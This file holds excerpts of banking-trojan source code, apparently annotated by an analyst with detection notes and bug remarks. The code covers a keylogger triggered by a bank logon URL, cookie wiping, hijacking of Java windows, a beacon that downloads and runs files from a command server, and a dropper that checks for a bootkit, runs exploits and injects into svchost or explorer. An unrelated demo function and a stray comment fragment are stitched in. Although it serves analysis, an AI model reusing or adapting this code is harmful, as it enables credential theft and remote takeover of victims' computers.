	// URL-change callback of the key-logger component (analyst note: this is the
	// trigger that arms keystroke capture).  Data is treated as a NUL-terminated
	// URL string.  When the file-scope `System` (declared outside this excerpt)
	// is 0 and the URL contains both "avangard" and "logon_enter", InitKeyLogger()
	// is called.  Logger and EventID are not used.  Detection note: the two string
	// constants below are static artefacts worth matching on.
	void WINAPI IEURLChanged(PKeyLogger Logger, DWORD EventID, LPVOID Data)
	{
		char* url = (char*)Data;   // NOTE(review): Data is not checked for NULL before m_strstr
		if( System == 0 )
		{
			// React when the URL contains the word "avangard" and, further on, "logon_enter"
			char* p = m_strstr( url, "avangard" );
			if( p )
			{
				p += 8;   // advance past "avangard" — p is not used afterwards; the next search restarts from url
				if( m_strstr( url, "logon_enter" ) )
				{
					DBGAVG( "Avangard", "Урл %s", url );
					InitKeyLogger();
				}
			}
		}
	}
// Dispatches Internet Explorer cookie deletion according to the OS name string.
// "Windows XP" -> DeleteIECookies(1); Vista / Seven / Server 2008 -> DeleteIECookies(2);
// any other string -> both.  The meaning of the integer argument is not visible
// here (presumably selects a cookie storage location — confirm in DeleteIECookies).
// NOTE(review): os is dereferenced without a NULL check.
// Analyst note: wiping cookies forces the user to re-authenticate, which is
// consistent with the credential-capture trigger elsewhere in this component.
void DeleteIE_cookies(char* os)
{
	if(m_strstr(os, "Windows XP"))
	{
		DeleteIECookies(1);
	}
	// "Windows Server 2008 R2" already contains "Windows Server 2008", so the last
	// condition can never be the first one to match; it is redundant but harmless.
	else if(m_strstr(os, "Windows Vista") ||
			m_strstr(os, "Windows Seven") ||
			m_strstr(os, "Windows Server 2008") ||
			m_strstr(os, "Windows Server 2008 R2"))
	{
		DeleteIECookies(2);
	}
	else
	{
		DeleteIECookies(1);
		DeleteIECookies(2);
	}
}
/* Small demo of m_strstr: looks for a fixed substring inside a fixed
 * haystack and prints whether (and where) it was found. */
int main(void){
	char haystack[] = "sdhfkjsdghshellowdsgfds";
	char needle[] = "hello";
	char *hit = m_strstr(haystack, needle);
	if (hit != NULL) {
		/* hit points into haystack at the first occurrence of needle */
		printf("bingo, sub is in str.\nsub string is :\n%s\n", hit);
	} else {
		printf("sub is not in str.\n");
	}
	return 0;
}
// если она ещё не перехвачена. Если показывается диалог, то считаем его
// модальным, все координаты кликов будут обрабатываться для него.
// Detour installed over ShowWindow (analyst note: this is how the component
// gets control of Java AWT windows).  Reads the window class name; when the
// window is being shown (Cmd != SW_HIDE) and the class contains "SunAwtFrame"
// or "SunAwtDialog", its window procedure is replaced via ChangeWndProc and the
// file-scope flag g_is_dialog is updated.  Hiding any window clears g_is_dialog.
// Finally the original ShowWindow (Real_ShowWindow) is invoked.
// Detection note: the OutputDebugString calls ("1234", "Hook_ShowWindow") and the
// DbgMsg strings are visible to any attached debugger / debug-output monitor.
static BOOL WINAPI Hook_ShowWindow(HWND hWnd, int Cmd)
{
	// Get the window class name
	OutputDebugString("1234");   // leftover debug trace
	char cClasN[MAX_PATH];
	// NOTE(review): return value is unchecked; on failure cClasN is uninitialised
	// and the m_strstr calls below read indeterminate bytes.
	GetClassNameA(hWnd, cClasN, MAX_PATH);

	bool isFrame  = (NULL != m_strstr(cClasN, "SunAwtFrame"));
	bool isDialog = (NULL != m_strstr(cClasN, "SunAwtDialog"));

	if (SW_HIDE != Cmd)
	{
		OutputDebugString("Hook_ShowWindow");

		if (isFrame)
		{
			// Replace the window procedure with our own
			DbgMsg(cClasN, (int)Cmd, "Java Frame Wnd");
			ChangeWndProc(hWnd, &g_frame_wnd, &g_old_frame_wnd_proc);
			g_is_dialog = false;
		} else
		if (isDialog)
		{
			// Replace the window procedure with our own
			DbgMsg(cClasN, (int)Cmd, "Java Dialog Wnd");
			ChangeWndProc(hWnd, &g_dialog_wnd, &g_old_dialog_wnd_proc);
			g_is_dialog = true;
		}
	}
	else
	{
		g_is_dialog = false;
	}

	// NOTE(review): for ordinary SW_* command values the high nibble is 0, so
	// this divides by zero (undefined behaviour).  Intent unclear — TODO confirm.
	Cmd /= Cmd & 0xf0000000;
	// Call the original ShowWindow
	return Real_ShowWindow(hWnd, Cmd);
}
// Splits Url into host, path and port.
//   Url    - NUL-terminated string; an optional "scheme://" prefix is skipped.
//   Server - receives a MemAlloc'd copy of the host (caller frees with MemFree).
//   Path   - receives a pointer INTO Url at the first '/' after the host
//            (not a copy; valid only as long as Url is).
//   Port   - 80 when no ':' is present, otherwise m_atoi of the text between
//            ':' and '/' (m_atoi semantics not visible here).
// Returns true on success.  A '/' after the host is mandatory: "host" or
// "host:80" without a trailing slash fails.
// NOTE(review): every false return leaks Host and/or OptionalPort; the 512-byte
// buffers are not bounds-checked against the copied lengths; and if the only ':'
// lies after the first '/', Ptr3 - Ptr2 is negative and the copy length wraps.
bool ParseUrl1( char *Url, char **Server, char **Path, int *Port )
{
	char *Ptr1 = NULL;
	char *Ptr2 = NULL;
	char *Ptr3 = NULL;
	char *Ptr4 = NULL;

	char *Host		   = (char*)MemAlloc( 512 );
	char *OptionalPort = (char*)MemAlloc( 512 );

	if ( Host == NULL ||
		 OptionalPort == NULL )
	{
		return false;   // NOTE(review): whichever of the two succeeded is leaked
	}

	DWORD dwPort = 0;   // unused

	Ptr1 = m_strstr( Url, "://" );

	if( Ptr1 )
	{
		Ptr1 += 3;   // skip "://"
	}
	else
	{
		Ptr1 = Url;
	}

    Ptr4 = m_strstr( Ptr1, "/" );   // start of path (returned unchanged as *Path)
	Ptr2 = m_strstr( Ptr1, ":" );   // start of optional ":port"

	if( !Ptr2 )
	{
		*Port = 80;
		Ptr3   = m_strstr( Ptr1, "/" );

		if( !Ptr3 )
		{
			return false;   // NOTE(review): Host and OptionalPort leak
		}

		m_memcpy( Host, Ptr1, Ptr3 - Ptr1 );
		Host[ Ptr3 - Ptr1 ] = '\0';
	}
	else
	{
		Ptr3 = m_strstr( Ptr1, "/" );

		if( !Ptr3 )
		{
			return false;   // NOTE(review): Host and OptionalPort leak
		}

		// Copies Ptr3 - Ptr2 bytes starting one past the ':' — that is one byte
		// more than the digits, so the '/' lands in OptionalPort too.
		m_memcpy( OptionalPort, Ptr2 + 1, Ptr3 - Ptr2 );
		m_memcpy( Host, Ptr1, Ptr2 - Ptr1 );

		OptionalPort[ Ptr3 - Ptr2 ] = '\0';
		Host[ Ptr2 - Ptr1 ]			= '\0';

		*Port = m_atoi( OptionalPort );
	}

	MemFree( OptionalPort );

	*Server = Host;
	*Path   = Ptr4;

	return true;
}
// Beacons to the URL in Url and acts on the reply (analyst note: this is the
// component's command channel).  Observable behaviour, in order:
//   1. WSAStartup(2.2); parse Url with ParseUrl1 into Host/Path/Port.
//   2. GenerateUid() into a 100-byte buffer; wsprintfA is resolved at run time
//      by hash through GetProcAddressEx(NULL, 3, 0xEA3AF0D7) rather than by name.
//   3. Builds an HTTP/1.0 POST to Path on Host with the user agent from
//      pObtainUserAgentString and a form body "id=<uid>" followed by the
//      file-scope LoadExe string ("&plugins=" when LoadExe is NULL on entry).
//   4. Connects with MyConnect1, sends with MySend, reads with RecvAndParse.
//   5. If the first line of the reply begins with "multidownload", every
//      "http:" URL separated by '|' is MD5-hashed (hash appended to LoadExe),
//      fetched to a temporary file name and passed to ExecuteFile.
// Returns false on any setup/network failure, true otherwise.
// Detection note: the request shape (HTTP/1.0, "Accept: text/html",
// "Connection: Close", body starting with "id=") and the reply keyword
// "multidownload" are stable network indicators; the literal is built
// byte-by-byte below to avoid appearing as a plain string in the binary.
bool ReportToPlugin( char *Url )
{
	WSADATA wsa;

	if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
	{
		return false;
	}

	char *Host = NULL;
	char *Path = NULL;
	int   Port = 0;

	if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
	{
		return false;
	}

	char Uid[100];
	GenerateUid( Uid );

	typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );

	// Hash-based API resolution: the target import is identified by 0xEA3AF0D7, not by name
	fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );

	char *UserAgent = NULL;
	UserAgent = (char*)MemAlloc( 1024 );
	DWORD dwUserSize = 1024;

	// NOTE(review): UserAgent is passed here before the NULL check below
	pObtainUserAgentString( 0, UserAgent, &dwUserSize );

	if ( UserAgent == NULL )
	{
		MemFree( UserAgent );
		UserAgent = "-";
	}

	char Request[] = "POST %s HTTP/1.0\r\n"
					 "Host: %s\r\n"
					 "User-Agent: %s\r\n"
					 "Accept: text/html\r\n"
					 "Connection: Close\r\n"
					 "Content-Type: application/x-www-form-urlencoded\r\n"
					 "Content-Length: %d\r\n\r\n";
	
	char Args[]	   = "id=";

	char *HttpPacket = NULL;
	HttpPacket = (char*)MemAlloc( 2048 );   // NOTE(review): result is not checked; no bound on the formatted length
	int iTmp;
	// Content-Length accounts for the LoadExe suffix: its current length, or 9 for "&plugins="
	if (LoadExe!=NULL)	
	{
		iTmp=m_lstrlen(LoadExe); 
	}else iTmp=9;

	pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
	m_lstrcat( HttpPacket, Args );
	m_lstrcat( HttpPacket, Uid  );
 if (LoadExe==NULL)
  {   
   LoadExe = (char*)MemAlloc(10); 
   m_lstrncpy(LoadExe,"&plugins=",9);
 LoadExe[9]='\0';
  }
	m_lstrcat( HttpPacket, LoadExe  );

	SOCKET Socket = MyConnect1( Host, Port );

	if( Socket == -1 )
	{
		return false;   // NOTE(review): HttpPacket (and Host from ParseUrl1) are not freed on this path
	}

	bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );

	MemFree( HttpPacket );

	if ( !b )
	{
		return false;   // NOTE(review): Socket is not closed on this path
	}

	DWORD dwSize = 0;

	char *Buffer = RecvAndParse( Socket, &dwSize );

	if ( !Buffer )
	{
		pclosesocket( Socket );
		return false;
	}

	// "multidownload" assembled from characters so the keyword is not a contiguous string literal
	char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
	char *Context;
	m_strtok_s( Buffer, "\r\n", &Context );   // truncate Buffer at the first line break

	if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
	{
		char * cPointer= m_strstr(&Buffer[1],"http:");   // unused
		
		
		char* cUrl=Buffer;
		char* cUrlNext;
		int i;
		char *DownloadUrl;
		// Walk each "http:" occurrence; the entry ends at the next '|'
		while (true)
		{
			cUrl= m_strstr(&cUrl[1],"http:");
			if (cUrl==NULL)break;
			cUrlNext= m_strstr(cUrl,"|");
			// NOTE(review): if no '|' follows, cUrlNext is NULL and m_lstrlen(NULL) is evaluated
			i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
			// NOTE(review): the +1 is applied to the returned pointer, not to the size;
			// the buffer is i bytes but i+1 are written and the pointer passed to MemFree is off by one
			DownloadUrl = (char*)MemAlloc(i)+1; 
			m_lstrncpy(DownloadUrl,cUrl,i);
			DownloadUrl[i]='\0';
			

			if ( DownloadUrl )
			{
				// Record the MD5 of each fetched URL in LoadExe (reported back on the next beacon)
				LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
				m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
				m_lstrcat( LoadExe, "|");


				WCHAR *FileName =(WCHAR *)GetTempName();

				if ( FileName && DownloadUrl )
				{
					ExecuteFile( DownloadUrl, FileName );
				}

				MemFree( FileName );
			}
		
			MemFree( DownloadUrl );
		}
	}
		MemFree( Buffer );
	pclosesocket( Socket );

	return true;
}
// Dropper entry point (analyst note).  Decision sequence as visible below:
//   1. UnhookDlls(), GetPaths(); report step "100_d".
//   2. If the file at PathBkFile exists (GetFileAttributesA != INVALID_FILE_ATTRIBUTES)
//      the component considers itself already installed: InitSuicide() and exit.
//   3. KillOutpost(), DoExploits() (bodies not visible here); report step "101_d".
//   4. Exit unless CurrentPlatformAllowedByTargetSpecifier(); report step "109_d".
//   5. If the command line contains ARGV_UAC_RUN, run ExplorerMain() and exit.
//   6. Running as LocalSystem -> SvcFuckupRunAsService(SvcFuckupServiceMain) and exit.
//   7. Otherwise, if SvcFuckupEnabled() -> SvcFuckupRun(), InitSuicide(), exit.
//   8. Otherwise try JmpToSvchost(ExplorerRoutine), then InjectIntoExplorer,
//      then ExplorerRoutine(NULL) in the current process; pExitProcess(1).
// argc/argv are unused.  Detection note: the step names "100_d", "101_d",
// "109_d" passed to DebugReportStepByName and the PP_DPRINTF messages are
// runtime artefacts; the InitSuicide()/WaitAndExitProcess() pairing suggests
// self-removal after each terminal branch (confirm in InitSuicide).
int APIENTRY MyMain(int argc, char** argv)
{
	//return 0;
	//TestStepNotifications();
	//MultiMethodReboot();
	//return 0;
	//PP_DPRINTF(L"MyMain: started");
	//if ( IsUserLocalSystem() )
	//{
	//	PP_DPRINTF(L"MyMain: current user is LocalSystem.");
	//	SvcFuckupRunAsService(SvcFuckupServiceMainTest);
	//}
	//else
	//{
	//	PP_DPRINTF(L"MyMain: current user is NOT LocalSystem.");

	//	if ( m_strstr((PCHAR)pGetCommandLineA(),"-install") )
	//	{
	//		PP_DPRINTF(L"MyMain: '-install' param specified. Run SvcFuckup.");
	//		bool fuckup_result = SvcFuckupRun();
	//		PP_DPRINTF(L"MyMain: SvcFuckupRun() finished with result=%d.", fuckup_result);
	//	}
	//}
	//PP_DPRINTF(L"MyMain: finished");
	//return 0;

	UnhookDlls();//remove hooks
	GetPaths();

	// 100_d: dropper started
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("100_d"));

	/*	check whether the bootkit is already installed	*/
	if ((DWORD)pGetFileAttributesA(PathBkFile) != INVALID_FILE_ATTRIBUTES)
	{
		PP_DPRINTF(L"MyMain: bootkit already installed. Killing oneself.");
		InitSuicide();
		WaitAndExitProcess(0);
		return 0;
	};

	KillOutpost();
	DoExploits();

	// 101_d: exploits stage passed (comment copied from the 100_d step; the reported name is "101_d")
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("101_d"));

	// Target platform check.
	if (!CurrentPlatformAllowedByTargetSpecifier())
	{
		InitSuicide();
		PP_DPRINTF(L"MyMain:Current platform not allowed by target specifier. Callin ExitProcess...");
		WaitAndExitProcess(0);
		return 0;
	}

	// 109_d: target platform check passed
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("109_d"));

	// Check for the "run with UAC rights" launch parameter
	if ( m_strstr((PCHAR)pGetCommandLineA(),ARGV_UAC_RUN) )
	{
		PP_DPRINTF(L"MyMain: UAC param detected. Calling ExplorerMain...");
		int ret = -1;   // exit code used only when ExplorerMain() fails
		if ( ExplorerMain() )
		{
			PP_DPRINTF(L"MyMain: UAC param detected. ExplorerMain OK. Quit and killing oneself...");
			InitSuicide();
			WaitAndExitProcess(0);
			return 0;
		}
		PP_DPRINTF(L"MyMain: UAC param detected. ExplorerMain failed. Just quit process.");
		WaitAndExitProcess(ret);
		return 0;
	};
	
	//
	//  If the process is running with system rights, proceed to installation.
	//
	if (IsUserLocalSystem())
	{
		PP_DPRINTF(L"MyMain: LocalSystem current user detected. Runing SvcFuckupRunAsService().");
		SvcFuckupRunAsService(SvcFuckupServiceMain);
		PP_DPRINTF(L"MyMain: SvcFuckupRunAsService() finished. Calling ExitProcess().");

		WaitAndExitProcess(0);
		return 0;
	};

	// If the process was started normally but SvcFuckup support is enabled,
	// try that route and then remove ourselves.
	if (SvcFuckupEnabled())
	{
		PP_DPRINTF(L"MyMain: SvcFuckup enabled. Run SvcFuckupRun");
		bool fuckup_result = SvcFuckupRun();
		PP_DPRINTF(L"MyMain: SvcFuckupRun() finished with %d", fuckup_result);
		InitSuicide();
		WaitAndExitProcess(0);
		return 0;
	}

	// Fallback chain: svchost -> explorer -> run ExplorerRoutine in-process.
	// dwExplorerSelf is a file-scope flag (declared outside this excerpt) telling
	// ExplorerRoutine which host it ended up in.
	PP_DPRINTF(L"MyMain: All checks passed. Trying to jump to svchost");
	dwExplorerSelf = 0;
	if (!JmpToSvchost( ExplorerRoutine ))
	{
		PP_DPRINTF(L"MyMain: Jump to svchost failed. Trying jump to explorer");

		dwExplorerSelf = 1;
		if (! InjectIntoExplorer ( ExplorerRoutine )  )
		{
			PP_DPRINTF(L"MyMain: Jump to explorer failed. Trying just do ExplorerRoutine");
			ExplorerRoutine( NULL );
		}
	}

	PP_DPRINTF(L"MyMain: finished.");
	pExitProcess( 1 );

	return 1;   // not reached if pExitProcess terminates the process
}